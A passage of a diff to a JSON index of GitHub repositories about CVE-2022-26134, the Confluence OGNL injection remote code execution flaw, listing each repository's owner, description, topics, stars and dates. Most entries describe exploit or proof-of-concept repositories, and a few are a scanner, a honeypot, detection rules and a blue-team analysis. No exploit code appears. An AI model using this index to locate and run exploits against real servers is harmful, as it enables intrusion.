"is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2022-26134", + "linux", + "yara" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499532057, + "name": "through_the_wire", + "full_name": "jbaines-r7\/through_the_wire", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/through_the_wire", + "description": "CVE-2022-26134 Proof of Concept", + "fork": false, + "created_at": "2022-06-03T13:59:19Z", + "updated_at": "2024-11-18T06:36:21Z", + "pushed_at": "2022-06-06T16:38:49Z", + "stargazers_count": 159, + "watchers_count": 159, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26134", + "exploit", + "poc" + ], + "visibility": "public", + "forks": 48, + "watchers": 159, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499627349, + "name": "CVE-2022-26134", + "full_name": "crowsec-edtech\/CVE-2022-26134", + "owner": { + "login": "crowsec-edtech", + "id": 97851186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4", + "html_url": "https:\/\/github.com\/crowsec-edtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crowsec-edtech\/CVE-2022-26134", + "description": "CVE-2022-26134 - Confluence Pre-Auth RCE | OGNL injection", + "fork": false, + "created_at": "2022-06-03T19:24:30Z", + "updated_at": "2024-11-02T04:07:36Z", + "pushed_at": "2022-06-03T19:59:01Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 32, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499737342, + "name": "CVE-2022-26134", + "full_name": "kyxiaxiang\/CVE-2022-26134", + "owner": { + "login": "kyxiaxiang", + "id": 102843981, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102843981?v=4", + "html_url": "https:\/\/github.com\/kyxiaxiang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kyxiaxiang\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-06-04T05:46:48Z", + "updated_at": "2024-08-12T20:23:49Z", + "pushed_at": "2022-06-04T05:48:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499793442, + "name": "CVE-2022-26134", + "full_name": "Brucetg\/CVE-2022-26134", + "owner": { + "login": "Brucetg", + "id": 30258075, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30258075?v=4", + "html_url": "https:\/\/github.com\/Brucetg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Brucetg\/CVE-2022-26134", + "description": "(CVE-2022-26134)an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server", + "fork": false, + "created_at": "2022-06-04T10:27:50Z", + "updated_at": "2022-06-07T09:19:24Z", + "pushed_at": "2022-06-05T15:43:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 499796993, + "name": "CVE-2022-26134", + "full_name": "shamo0\/CVE-2022-26134", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/CVE-2022-26134", + "description": "Confluence Server and Data Center - CVE-2022-26134 - Critical severity unauthenticated remote code execution vulnerability PoC", + "fork": false, + "created_at": "2022-06-04T10:44:38Z", + "updated_at": "2024-06-21T00:10:06Z", + "pushed_at": "2022-06-04T12:53:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "26134", + "atlassian", + "center", + "code", + "confluence", + "cve-2022-26134", + "data", + "execution", + "exploit", + "injection", + "ognl", + "poc", + "python", + "rce", + "remote", + "server" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499803880, + "name": "CVE-2022-26134", + "full_name": "SNCKER\/CVE-2022-26134", + "owner": { + "login": "SNCKER", + "id": 49559334, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49559334?v=4", + "html_url": "https:\/\/github.com\/SNCKER", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SNCKER\/CVE-2022-26134", + "description": "[CVE-2022-26134]Confluence OGNL expression injected RCE with sandbox bypass.", + "fork": false, + "created_at": "2022-06-04T11:16:28Z", + "updated_at": "2024-08-12T20:23:50Z", + "pushed_at": "2022-06-18T09:27:31Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve-2022-26134", + "rce", + "vulnerability" + ], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 500090459, + "name": "Confluence-CVE-2022-26134", + "full_name": "Vulnmachines\/Confluence-CVE-2022-26134", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Confluence-CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-06-05T12:23:34Z", + "updated_at": "2024-08-12T20:23:52Z", + "pushed_at": "2022-07-13T14:42:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 500108519, + "name": "CVE-2022-26134", + "full_name": "axingde\/CVE-2022-26134", + "owner": { + "login": "axingde", + "id": 65204372, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65204372?v=4", + "html_url": "https:\/\/github.com\/axingde", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/axingde\/CVE-2022-26134", + "description": "Atlassian confluence poc", + "fork": false, + "created_at": "2022-06-05T13:41:25Z", + "updated_at": "2022-06-05T13:44:25Z", + "pushed_at": "2022-06-05T13:50:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500178178, + "name": "CVE-2022-26134", + "full_name": "0xAgun\/CVE-2022-26134", + "owner": { + "login": "0xAgun", + "id": 78228966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4", + "html_url": "https:\/\/github.com\/0xAgun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAgun\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-06-05T18:23:20Z", + "updated_at": "2024-08-12T20:23:53Z", + "pushed_at": "2022-06-06T08:19:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "confluence-server", + "cve-2022-26134" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500206112, + "name": "CVE-2022-26134", + "full_name": "abhishekmorla\/CVE-2022-26134", + "owner": { + "login": "abhishekmorla", + "id": 56071093, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56071093?v=4", + "html_url": "https:\/\/github.com\/abhishekmorla", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abhishekmorla\/CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-06-05T20:35:38Z", + "updated_at": "2024-07-15T13:43:50Z", + "pushed_at": "2022-06-08T15:35:44Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500269755, + "name": "CVE-2022-26134", + "full_name": "hev0x\/CVE-2022-26134", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2022-26134", + "description": "Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)", + "fork": false, + "created_at": "2022-06-06T02:43:06Z", + "updated_at": "2024-11-10T22:15:48Z", + "pushed_at": "2022-06-06T03:37:25Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 38, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500314198, + "name": "Confluence-CVE-2022-26134", + "full_name": "archanchoudhury\/Confluence-CVE-2022-26134", + "owner": { + "login": "archanchoudhury", + "id": 51078911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51078911?v=4", + "html_url": "https:\/\/github.com\/archanchoudhury", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/archanchoudhury\/Confluence-CVE-2022-26134", + "description": "This repository talks about Zero-Day Exploitation of Atlassian Confluence, it's defense and analysis point of view from a SecOps or Blue Team perspective", + "fork": false, + "created_at": "2022-06-06T06:16:47Z", + "updated_at": "2022-07-21T05:51:46Z", + "pushed_at": "2022-06-10T03:12:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500494379, + "name": "confluencePot", + "full_name": "SIFalcon\/confluencePot", + "owner": { + "login": "SIFalcon", + "id": 85565580, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85565580?v=4", + "html_url": "https:\/\/github.com\/SIFalcon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SIFalcon\/confluencePot", + "description": "Simple Honeypot for Atlassian Confluence (CVE-2022-26134)", + "fork": false, + "created_at": "2022-06-06T15:44:24Z", + "updated_at": "2024-10-17T12:57:51Z", + "pushed_at": "2022-06-07T08:51:53Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26134", + "defense", + "honeypot", + "vulnerability" + ], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 500659259, + "name": "CVE-2022-26134-Confluence", + "full_name": "vesperp\/CVE-2022-26134-Confluence", + "owner": { + "login": "vesperp", + "id": 28191544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28191544?v=4", + "html_url": "https:\/\/github.com\/vesperp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vesperp\/CVE-2022-26134-Confluence", + "description": null, + "fork": false, + "created_at": "2022-06-07T02:16:56Z", + "updated_at": "2022-06-07T02:20:41Z", + "pushed_at": "2022-06-07T02:22:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500724915, + "name": "CVE-2022-26134", + "full_name": "li8u99\/CVE-2022-26134", + "owner": { + "login": "li8u99", + "id": 37184853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37184853?v=4", + "html_url": "https:\/\/github.com\/li8u99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/li8u99\/CVE-2022-26134", + "description": "Atlassian Confluence 远程代码执行漏洞(CVE-2022-26134)", + "fork": false, + "created_at": "2022-06-07T06:57:02Z", + "updated_at": "2024-08-12T20:23:55Z", + "pushed_at": "2022-06-30T01:07:17Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500763711, + "name": "cve-2022-26134", + "full_name": "reubensammut\/cve-2022-26134", + "owner": { + "login": "reubensammut", + "id": 760324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/760324?v=4", + "html_url": "https:\/\/github.com\/reubensammut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reubensammut\/cve-2022-26134", + "description": "Implementation of CVE-2022-26134", + "fork": false, + "created_at": "2022-06-07T08:58:07Z", + "updated_at": "2022-06-07T09:21:42Z", + "pushed_at": "2022-06-07T09:20:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500770603, + "name": "CVE-2022-26134-Godzilla-MEMSHELL", + "full_name": "BeichenDream\/CVE-2022-26134-Godzilla-MEMSHELL", + "owner": { + "login": "BeichenDream", + "id": 43266206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43266206?v=4", + "html_url": "https:\/\/github.com\/BeichenDream", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BeichenDream\/CVE-2022-26134-Godzilla-MEMSHELL", + "description": null, + "fork": false, + "created_at": "2022-06-07T09:19:02Z", + "updated_at": "2024-11-11T03:33:36Z", + "pushed_at": "2022-06-07T10:35:18Z", + "stargazers_count": 333, + "watchers_count": 333, + "has_discussions": false, + "forks_count": 54, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 54, + "watchers": 333, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 500795216, + "name": "CVE-2022-26134", + "full_name": "alcaparra\/CVE-2022-26134", + "owner": { + "login": "alcaparra", + "id": 105424007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105424007?v=4", + "html_url": "https:\/\/github.com\/alcaparra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alcaparra\/CVE-2022-26134", + "description": "CVE-2022-26134 Confluence OGNL Injection POC", + "fork": false, + "created_at": "2022-06-07T10:36:11Z", + "updated_at": "2023-07-14T21:00:43Z", + "pushed_at": "2022-06-07T10:53:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500808226, + "name": "CVE-2022-26134-Confluence-RCE", + "full_name": "whokilleddb\/CVE-2022-26134-Confluence-RCE", + "owner": { + "login": "whokilleddb", + "id": 56482137, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56482137?v=4", + "html_url": "https:\/\/github.com\/whokilleddb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whokilleddb\/CVE-2022-26134-Confluence-RCE", + "description": "Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Execution via OGNL Injection ", + "fork": false, + "created_at": "2022-06-07T11:17:25Z", + "updated_at": "2024-09-24T14:51:36Z", + "pushed_at": "2022-07-24T06:12:44Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 500820231, + "name": "CVE-2022-26134", + "full_name": "Habib0x0\/CVE-2022-26134", + "owner": { + "login": "Habib0x0", + "id": 24976957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24976957?v=4", + "html_url": "https:\/\/github.com\/Habib0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Habib0x0\/CVE-2022-26134", + "description": "Atlassian Confluence- Unauthenticated OGNL injection vulnerability (RCE) ", + "fork": false, + "created_at": "2022-06-07T11:55:37Z", + "updated_at": "2024-09-30T00:51:35Z", + "pushed_at": "2022-06-07T22:19:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 500924659, + "name": "Confluence-CVE-2022-26134", + "full_name": "Y000o\/Confluence-CVE-2022-26134", + "owner": { + "login": "Y000o", + "id": 46235512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46235512?v=4", + "html_url": "https:\/\/github.com\/Y000o", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y000o\/Confluence-CVE-2022-26134", + "description": null, + "fork": false, + "created_at": "2022-06-07T16:42:36Z", + "updated_at": "2024-08-12T20:23:55Z", + "pushed_at": "2022-06-07T16:59:37Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501104717, + "name": "ConfluentPwn", + "full_name": "redhuntlabs\/ConfluentPwn", + "owner": { + "login": "redhuntlabs", + "id": 36505047, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36505047?v=4", + "html_url": "https:\/\/github.com\/redhuntlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redhuntlabs\/ConfluentPwn", + "description": "Atlassian confluence unauthenticated ONGL injection remote code execution scanner (CVE-2022-26134).", + "fork": false, + "created_at": "2022-06-08T04:53:31Z", + "updated_at": "2024-08-12T20:23:56Z", + "pushed_at": "2022-06-10T11:07:50Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501474243, + "name": "CVE-2022-26134", + "full_name": "cai-niao98\/CVE-2022-26134", + "owner": { + "login": "cai-niao98", + "id": 52815221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52815221?v=4", + "html_url": "https:\/\/github.com\/cai-niao98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cai-niao98\/CVE-2022-26134", + "description": "CVE-2022-26134", + "fork": false, + "created_at": "2022-06-09T02:11:58Z", + "updated_at": "2024-08-12T20:23:58Z", + "pushed_at": "2022-06-09T02:43:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501971572, + "name": "exploit_CVE-2022-26134", + "full_name": "sunny-kathuria\/exploit_CVE-2022-26134", + "owner": { + "login": "sunny-kathuria", + "id": 41035660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41035660?v=4", + "html_url": "https:\/\/github.com\/sunny-kathuria", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunny-kathuria\/exploit_CVE-2022-26134", + "description": "CVE-2022-26134, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This is CVE-2022-26134 expoitation script", + "fork": false, + "created_at": "2022-06-10T08:57:30Z", + "updated_at": "2022-06-10T09:07:45Z", + "pushed_at": "2022-06-10T09:16:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 502137857, + "name": "BotCon", + "full_name": "KeepWannabe\/BotCon", + "owner": { + "login": "KeepWannabe", + "id": 31374361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31374361?v=4", + "html_url": "https:\/\/github.com\/KeepWannabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KeepWannabe\/BotCon", + "description": "[CVE-2022-26134] Attlasian Confluence RCE", + "fork": false, + "created_at": "2022-06-10T18:07:16Z", + "updated_at": "2024-01-23T11:34:20Z", + "pushed_at": "2022-06-10T18:22:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 503139905, + "name": "CVE-2022-26134", + "full_name": "Chocapikk\/CVE-2022-26134", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-26134", + "description": "CVE-2022-26134 - Pre-Auth Remote Code Execution via OGNL Injection", + "fork": false, + "created_at": "2022-06-13T23:01:39Z", + "updated_at": "2024-08-12T20:24:07Z", + "pushed_at": "2022-10-19T16:27:48Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 505123172, + "name": "CVE-2022-26134", + "full_name": "AmoloHT\/CVE-2022-26134", + "owner": { + "login": "AmoloHT", + "id": 106687805, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106687805?v=4", + "html_url": "https:\/\/github.com\/AmoloHT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AmoloHT\/CVE-2022-26134", + "description": "「💥」CVE-2022-26134 - Confluence Pre-Auth RCE", + "fork": false, + "created_at": "2022-06-19T13:50:22Z", + "updated_at": "2024-08-12T20:24:18Z", + "pushed_at": "2022-06-19T14:08:28Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve", + "cve-2022-26134", + "exploit", + "hacking", + "infosec", + "rce", + "security" + ], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 505820584, + "name": "CVE-2022-26134", + "full_name": "kh4sh3i\/CVE-2022-26134", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2022-26134", + "description": "[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE)", + "fork": false, + "created_at": "2022-06-21T11:49:48Z", + "updated_at": "2023-03-30T14:37:47Z", + "pushed_at": "2022-06-21T12:05:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "atlassian-jira", + "code", + "confluence", + "confluent-platform", + "cve", + "cve-2022-26134", + "jira", + "payload", + "poc", + "rce", + "remote" + ], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 506970785, + "name": "CVE-2022-26134", + "full_name": "ColdFusionX\/CVE-2022-26134", + "owner": { + "login": "ColdFusionX", + "id": 8522240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8522240?v=4", + "html_url": "https:\/\/github.com\/ColdFusionX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ColdFusionX\/CVE-2022-26134", + "description": "Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)", + "fork": false, + "created_at": "2022-06-24T10:33:13Z", + "updated_at": "2022-06-27T22:50:35Z", + "pushed_at": "2022-06-24T10:57:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "confluence", + "exploit", + "ognl", + "ognl-expression", + "rce", + "zeroday" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 508787615, + "name": "CVE-2022-26134_conFLU", + "full_name": "Luchoane\/CVE-2022-26134_conFLU", + "owner": { + "login": "Luchoane", + "id": 40374879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40374879?v=4", + "html_url": "https:\/\/github.com\/Luchoane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Luchoane\/CVE-2022-26134_conFLU", + "description": "PoC for exploiting CVE-2022-26134 on Confluence", + "fork": false, + "created_at": "2022-06-29T17:33:18Z", + "updated_at": "2022-06-29T17:34:07Z", + "pushed_at": "2022-07-01T18:41:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510402169, + "name": "TryHackMe-Atlassian-CVE-2022-26134", + "full_name": "r1skkam\/TryHackMe-Atlassian-CVE-2022-26134", + "owner": { + "login": "r1skkam", + "id": 58542375, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58542375?v=4", + "html_url": "https:\/\/github.com\/r1skkam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1skkam\/TryHackMe-Atlassian-CVE-2022-26134", + "description": "Atlassian, CVE-2022-26134 An interactive lab showcasing the Confluence Server and Data Center un-authenticated RCE vulnerability.", + "fork": false, + "created_at": "2022-07-04T15:00:21Z", + "updated_at": "2022-07-19T02:30:51Z", + "pushed_at": "2022-07-04T16:49:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510586350, + "name": "CVE-2022-26134", + "full_name": "nxtexploit\/CVE-2022-26134", + "owner": { + "login": "nxtexploit", + "id": 72358603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72358603?v=4", + "html_url": "https:\/\/github.com\/nxtexploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nxtexploit\/CVE-2022-26134", + "description": "Atlassian Confluence (CVE-2022-26134) - Unauthenticated Remote code execution (RCE)", + "fork": false, + "created_at": "2022-07-05T04:30:42Z", + "updated_at": "2024-10-17T11:52:02Z", + "pushed_at": "2024-08-23T18:52:52Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2022-26134", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 12, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 510624422, + "name": "CVE-2022-26134", + "full_name": "Debajyoti0-0\/CVE-2022-26134", + "owner": { + "login": "Debajyoti0-0", + "id": 79437050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79437050?v=4", + "html_url": "https:\/\/github.com\/Debajyoti0-0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Debajyoti0-0\/CVE-2022-26134", + "description": "Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE).", + "fork": false, + "created_at": "2022-07-05T07:04:50Z", + "updated_at": "2024-10-03T05:16:26Z", + "pushed_at": "2022-07-05T09:40:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian-confluence", + "cve-2022-26134", + "infosec", + "ognl-injection-vulnerability", + 